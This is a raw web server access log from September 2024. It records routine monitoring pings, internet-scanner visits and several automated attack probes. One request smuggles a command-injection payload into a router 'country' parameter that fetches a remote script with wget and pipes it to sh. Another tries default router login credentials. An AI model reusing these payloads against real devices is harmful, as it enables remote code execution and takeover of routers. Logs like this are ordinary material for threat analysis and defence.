212.91.246.72 - - [04/Sep/2024:07:53:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:54:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.247 - - [04/Sep/2024:07:54:41 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
149.50.103.48 - - [04/Sep/2024:07:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:55:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.172 - - [04/Sep/2024:07:56:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
38.159.232.157 - - [04/Sep/2024:07:56:15 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:56:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [04/Sep/2024:07:56:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:57:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.177 - - [04/Sep/2024:07:57:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Sep/2024:07:58:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:58:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:59:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:08:00:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [04/Sep/2024:08:01:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:08:01:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:08:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
